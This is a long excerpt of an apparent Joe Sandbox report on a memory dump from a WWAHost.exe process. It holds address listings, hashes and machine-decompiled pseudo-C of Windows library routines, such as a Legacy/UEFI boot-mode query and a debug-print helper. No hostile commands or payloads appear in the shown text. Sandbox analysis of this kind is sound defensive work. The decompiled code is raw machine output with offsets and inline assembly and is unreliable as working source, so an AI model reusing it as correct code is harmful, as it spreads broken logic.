                                              0x03a1e591
                                              0x03a1e592
                                              0x03a1e592
                                              0x03a1e596
                                              0x03a1e59e
                                              0x03a1e5a0
                                              0x03a1e5a6
                                              0x03a1e61d
                                              0x03a1e61d
                                              0x03a1e621
                                              0x03a1e623
                                              0x03a1e630
                                              0x03a1e630
                                              0x03a1e7e6
                                              0x03a1e7eb
                                              0x03a1e7ed
                                              0x03a1e7f4
                                              0x03a1e7fa
                                              0x03a1e7ff
                                              0x03a1e7ff
                                              0x03a1e80a
                                              0x03a1e812
                                              0x03a1e812
                                              0x03a1e5ab
                                              0x03a1e5b4
                                              0x03a1e5b9
                                              0x03a1e5be
                                              0x03a1e5c0
                                              0x03a1e5c2
                                              0x03a1e5c8
                                              0x03a1e5c9
                                              0x03a1e5cb
                                              0x03a1e5cc
                                              0x03a1e5d5
                                              0x03a1e5e4
                                              0x03a1e5f1
                                              0x03a1e5f8
                                              0x03a1e5f8
                                              0x03a1e5d5
                                              0x03a1e602
                                              0x03a1e616
                                              0x03a1e63d
                                              0x03a1e644
                                              0x03a1e64d
                                              0x03a1e652
                                              0x03a1e657
                                              0x03a1e659
                                              0x03a1e65b
                                              0x03a1e661
                                              0x03a1e662
                                              0x03a1e664
                                              0x03a1e665
                                              0x03a1e66e
                                              0x03a1e67d
                                              0x03a1e68a
                                              0x03a1e691
                                              0x03a1e691
                                              0x03a1e66e
                                              0x03a1e6b0
                                              0x00000000
                                              0x03a1e6b6
                                              0x03a1e6bd
                                              0x03a1e6c7
                                              0x03a1e6d7
                                              0x03a1e6d9
                                              0x03a1e6db
                                              0x03a1e6de
                                              0x03a1e6e3
                                              0x03a1e6f3
                                              0x03a1e6fc
                                              0x03a1e700
                                              0x03a1e700
                                              0x03a1e704
                                              0x03a1e70a
                                              0x03a1e70a
                                              0x03a1e713
                                              0x03a1e716
                                              0x03a1e719
                                              0x03a1e720
                                              0x03a1e761
                                              0x03a1e76b
                                              0x03a1e774
                                              0x03a1e77a
                                              0x03a1e77a
                                              0x03a1e78a
                                              0x03a1e791
                                              0x03a1e799
                                              0x03a1e79b
                                              0x03a1e79f
                                              0x03a1e7aa
                                              0x03a1e7c0
                                              0x03a1e7ac
                                              0x03a1e7b2
                                              0x03a1e7b9
                                              0x03a1e7b9
                                              0x03a1e7c7
                                              0x03a1e806
                                              0x00000000
                                              0x03a1e7c9
                                              0x03a1e7d1
                                              0x03a1e7d8
                                              0x00000000
                                              0x03a1e7d8
                                              0x00000000
                                              0x00000000
                                              0x03a1e722
                                              0x03a1e72e
                                              0x03a1e748
                                              0x03a1e74c
                                              0x03a1e754
                                              0x03a1e756
                                              0x03a1e75c
                                              0x03a1e75c
                                              0x00000000
                                              0x03a1e75c
                                              0x03a1e758
                                              0x03a1e758
                                              0x00000000
                                              0x03a1e758
                                              0x03a1e750
                                              0x00000000
                                              0x00000000
                                              0x03a1e752
                                              0x00000000
                                              0x03a1e752
                                              0x03a1e730
                                              0x03a1e735
                                              0x03a1e73d
                                              0x03a1e73f
                                              0x00000000
                                              0x00000000
                                              0x03a1e741
                                              0x03a1e741
                                              0x00000000
                                              0x03a1e741
                                              0x03a1e739
                                              0x00000000
                                              0x00000000
                                              0x03a1e73b
                                              0x00000000
                                              0x03a1e73b
                                              0x03a1e722
                                              0x03a1e720
                                              0x03a1e6b0
                                              0x03a1e618
                                              0x00000000
                                              0x03a1e618

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: 569fff29882134ab050dd9580a7c1253a43b2c077d6ad188115f50bff067e6b9
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: DC918F366043419FE724CF29C941F1BB7E6AF85714F18892EF9A9CB280E774E914CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E039D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x3a305f0);
				E039AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E039D53CA(0);
						return E039AD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0399F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03973690(1, _t117, 0x3931810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0399AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03974620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0399AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E039D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03999860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                              0x039d51be
                                              0x039d51c3
                                              0x039d51c8
                                              0x039d51cd
                                              0x039d51d0
                                              0x039d51d3
                                              0x039d51d8
                                              0x039d51db
                                              0x039d51de
                                              0x039d51e0
                                              0x039d51e3
                                              0x039d51e6
                                              0x039d51e8
                                              0x039d5342
                                              0x039d5351
                                              0x039d5356
                                              0x039d535a
                                              0x039d5360
                                              0x039d5363
                                              0x039d5366
                                              0x039d5369
                                              0x039d5369
                                              0x039d536b
                                              0x039d536b
                                              0x039d5370
                                              0x039d53a3
                                              0x039d53a4
                                              0x039d53a6
                                              0x039d53ab
                                              0x039d53ab
                                              0x039d53ae
                                              0x039d53ae
                                              0x039d53b5
                                              0x039d53bf
                                              0x039d53bf
                                              0x039d5375
                                              0x039d5396
                                              0x039d53a0
                                              0x039d53a0
                                              0x00000000
                                              0x039d5396
                                              0x039d5377
                                              0x039d5379
                                              0x039d537f
                                              0x039d538c
                                              0x039d5390
                                              0x00000000
                                              0x039d5390
                                              0x039d51ee
                                              0x039d51f1
                                              0x039d5301
                                              0x039d5310
                                              0x039d5315
                                              0x039d5318
                                              0x039d531b
                                              0x039d5320
                                              0x039d532e
                                              0x039d5331
                                              0x00000000
                                              0x039d5331
                                              0x039d5328
                                              0x039d5329
                                              0x00000000
                                              0x039d5329
                                              0x039d51fa
                                              0x039d5235
                                              0x039d5236
                                              0x039d5239
                                              0x039d523f
                                              0x039d5240
                                              0x039d5241
                                              0x039d5242
                                              0x039d5246
                                              0x039d5247
                                              0x039d524e
                                              0x039d5251
                                              0x039d5267
                                              0x039d5269
                                              0x039d526e
                                              0x039d527d
                                              0x039d527e
                                              0x039d5281
                                              0x039d5282
                                              0x039d5287
                                              0x039d5288
                                              0x039d528a
                                              0x039d528f
                                              0x039d5294
                                              0x00000000
                                              0x00000000
                                              0x039d529a
                                              0x039d529c
                                              0x039d529e
                                              0x039d529e
                                              0x039d52a4
                                              0x039d52b0
                                              0x00000000
                                              0x00000000
                                              0x039d52ba
                                              0x039d52bc
                                              0x039d52bc
                                              0x039d52d4
                                              0x039d52d9
                                              0x039d52dc
                                              0x039d52e1
                                              0x00000000
                                              0x00000000
                                              0x039d52e7
                                              0x039d52f4
                                              0x00000000
                                              0x039d52f4
                                              0x039d5270
                                              0x00000000
                                              0x039d5270
                                              0x039d51fc
                                              0x039d51fd
                                              0x039d5202
                                              0x039d5203
                                              0x039d5205
                                              0x039d520a
                                              0x039d520f
                                              0x00000000
                                              0x00000000
                                              0x039d521b
                                              0x039d5226
                                              0x039d522b
                                              0x039d521d
                                              0x039d521d
                                              0x039d5222
                                              0x039d5222
                                              0x039d522d
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 1d4dccb46011c728896f9bcbcb045bb95e7fb2ce5c168666fc9b8b6184a41b6e
                                              • Instruction ID: 906620853f5397023d4214e5fb0d98a3c09bdd833f19b41bee5f96a2cec31b33
                                              • Opcode Fuzzy Hash: 1d4dccb46011c728896f9bcbcb045bb95e7fb2ce5c168666fc9b8b6184a41b6e
                                              • Instruction Fuzzy Hash: 3F516AB1A00709DFDB24DFA88881AAEFBF8FB89740F15842DE509EB651D7719900CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E0397B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3a4d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03977D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03A28CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03999E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0399B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0399CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03977D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03A28F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0399AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3a48628; // 0x0
								_v68 = _t77;
								_t78 =  *0x3a4862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3a48628; // 0x0
							_t116 =  *0x3a4862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                              0x0397b94c
                                              0x0397b956
                                              0x0397b95c
                                              0x0397b95e
                                              0x0397b964
                                              0x0397b969
                                              0x0397b96d
                                              0x0397b96d
                                              0x0397b970
                                              0x0397b974
                                              0x0397b97a
                                              0x0397badf
                                              0x0397badf
                                              0x0397bae2
                                              0x0397bae4
                                              0x0397bae6
                                              0x0397baf0
                                              0x039c2cb8
                                              0x0397baf6
                                              0x0397baf6
                                              0x0397baf6
                                              0x0397bafd
                                              0x0397bb1f
                                              0x0397bb1f
                                              0x0397baff
                                              0x0397bb00
                                              0x0397bb00
                                              0x0397bb03
                                              0x0397bb03
                                              0x0397bacb
                                              0x0397bacf
                                              0x0397bad0
                                              0x0397bad1
                                              0x0397badc
                                              0x0397badc
                                              0x0397b980
                                              0x0397b980
                                              0x0397b988
                                              0x0397b98b
                                              0x0397b98d
                                              0x0397b990
                                              0x0397b993
                                              0x0397b999
                                              0x0397b99b
                                              0x0397b9a1
                                              0x0397b9a5
                                              0x0397b9aa
                                              0x0397b9b0
                                              0x0397b9bb
                                              0x0397b9c0
                                              0x0397b9c3
                                              0x0397b9ca
                                              0x0397b9cc
                                              0x0397b9cf
                                              0x0397b9d3
                                              0x0397b9d7
                                              0x0397ba94
                                              0x0397ba94
                                              0x0397ba98
                                              0x0397baa3
                                              0x039c2ccb
                                              0x0397baa9
                                              0x0397baa9
                                              0x0397baa9
                                              0x0397bab1
                                              0x039c2cd5
                                              0x039c2cdd
                                              0x039c2cdd
                                              0x0397babb
                                              0x0397babc
                                              0x0397bac2
                                              0x0397bac3
                                              0x0397bac3
                                              0x0397bac6
                                              0x00000000
                                              0x0397b9dd
                                              0x0397b9dd
                                              0x0397b9e7
                                              0x0397b9e7
                                              0x0397b9ec
                                              0x0397b9ec
                                              0x0397b9f1
                                              0x0397b9f5
                                              0x0397b9fa
                                              0x0397ba00
                                              0x0397ba0c
                                              0x0397ba10
                                              0x0397ba10
                                              0x0397ba12
                                              0x0397ba18
                                              0x00000000
                                              0x00000000
                                              0x0397bb26
                                              0x0397bb26
                                              0x0397ba1e
                                              0x0397ba1e
                                              0x0397ba23
                                              0x0397ba25
                                              0x0397ba2c
                                              0x0397ba30
                                              0x0397ba35
                                              0x0397ba35
                                              0x0397ba41
                                              0x0397ba46
                                              0x0397ba4c
                                              0x0397ba50
                                              0x0397ba54
                                              0x0397ba6a
                                              0x0397ba6e
                                              0x0397ba70
                                              0x0397ba74
                                              0x0397ba78
                                              0x0397ba7a
                                              0x0397ba7c
                                              0x0397ba8e
                                              0x0397ba90
                                              0x0397ba92
                                              0x0397bb14
                                              0x0397bb14
                                              0x0397bb16
                                              0x0397bb16
                                              0x00000000
                                              0x0397ba7c
                                              0x0397bb0a
                                              0x0397bb0d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0397bb0f

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0397B9A5
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: 7751580ed0a3014d8537f2ba3ceba75a10180ea1f7f4f629b63e4eb134ff8aec
                                              • Instruction ID: 6cf76f587731b0def3cc472be0d9f477451ae002b6dcbbb144195582140aecfc
                                              • Opcode Fuzzy Hash: 7751580ed0a3014d8537f2ba3ceba75a10180ea1f7f4f629b63e4eb134ff8aec
                                              • Instruction Fuzzy Hash: F5515875A08345CFD724EF29C08092AFBE9FB88654F24496EF99587394E731EC44CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E0395B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x3a2f7a8);
				E039AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E039AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0399D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0399F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L039ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0399B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0399B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0399E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0399A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                              0x0395b171
                                              0x0395b171
                                              0x0395b171
                                              0x0395b171
                                              0x0395b171
                                              0x0395b176
                                              0x0395b17b
                                              0x0395b180
                                              0x0395b186
                                              0x0395b18f
                                              0x0395b198
                                              0x0395b1a4
                                              0x0395b1aa
                                              0x039b4802
                                              0x039b4802
                                              0x039b4805
                                              0x039b480c
                                              0x039b480e
                                              0x0395b1d1
                                              0x0395b1d3
                                              0x0395b1de
                                              0x0395b1de
                                              0x039b4817
                                              0x039b481e
                                              0x039b4820
                                              0x039b4822
                                              0x039b4822
                                              0x039b4824
                                              0x039b4824
                                              0x039b482a
                                              0x00000000
                                              0x00000000
                                              0x039b4835
                                              0x039b483a
